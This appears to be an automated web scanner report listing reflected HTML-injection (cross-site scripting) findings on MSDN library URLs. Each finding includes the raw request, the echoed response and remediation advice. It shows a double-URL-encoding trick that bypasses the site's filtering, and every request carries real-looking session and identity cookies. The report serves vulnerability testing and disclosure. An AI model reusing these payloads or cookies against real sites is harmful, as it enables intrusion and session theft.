HTTP/1.1 200 OK Cache-Control: private Content-Length: 9229 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 18:13:32 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/libraryc0137"><a>0e5c27062dd/dd582938(v/x3doffice.11" /> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 68427%2522%253e%253ca%253ef797850a81e was submitted in the REST URL parameter 3. This input was echoed as 68427"><a>f797850a81e in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/library/dd582938(v68427%2522%253e%253ca%253ef797850a81e/x3doffice.11 HTTP/1.1 Host: msdn.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 9229 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 18:13:41 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/dd582938(v68427"><a>f797850a81e/x3doffice.11" /> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5fe24%2522%253e%253ca%253edee8348ee07 was submitted in the REST URL parameter 4. This input was echoed as 5fe24"><a>dee8348ee07 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/library/dd582938(v/x3doffice.115fe24%2522%253e%253ca%253edee8348ee07 HTTP/1.1 Host: msdn.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 9229 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 18:13:52 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/dd582938(v/x3doffice.115fe24"><a>dee8348ee07" /> ...[SNIP]...
2.62. http://msdn.microsoft.com/en-us/library/dd582938(v/x3doffice.11 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://msdn.microsoft.com
Path:
/en-us/library/dd582938(v/x3doffice.11
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 92bbc"><a>62955b61670 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /en-us/library/dd582938(v/x3doffice.11?92bbc"><a>62955b61670=1 HTTP/1.1 Host: msdn.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 10038 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 18:13:04 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/ms123402(l=MSDN.10).aspx?missingurl=/en-us/library/dd582938(v/x3doffice.11&92bbc"><a>62955b61670=1" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6483a%2522%253e%253ca%253e8800823c465 was submitted in the REST URL parameter 1. This input was echoed as 6483a"><a>8800823c465 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us6483a%2522%253e%253ca%253e8800823c465/library/dd582938(v=office.11 HTTP/1.1 Host: msdn.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 9223 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 18:13:31 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us6483a"><a>8800823c465/library/dd582938(v=office.11" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d55f6%2522%253e%253ca%253efdd48321b4d was submitted in the REST URL parameter 2. This input was echoed as d55f6"><a>fdd48321b4d in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/libraryd55f6%2522%253e%253ca%253efdd48321b4d/dd582938(v=office.11 HTTP/1.1 Host: msdn.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 9223 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 18:13:41 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/libraryd55f6"><a>fdd48321b4d/dd582938(v=office.11" /> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6e49d%2522%253e%253ca%253e35d14fe12fc was submitted in the REST URL parameter 3. This input was echoed as 6e49d"><a>35d14fe12fc in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/library/dd582938(v6e49d%2522%253e%253ca%253e35d14fe12fc=office.11 HTTP/1.1 Host: msdn.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 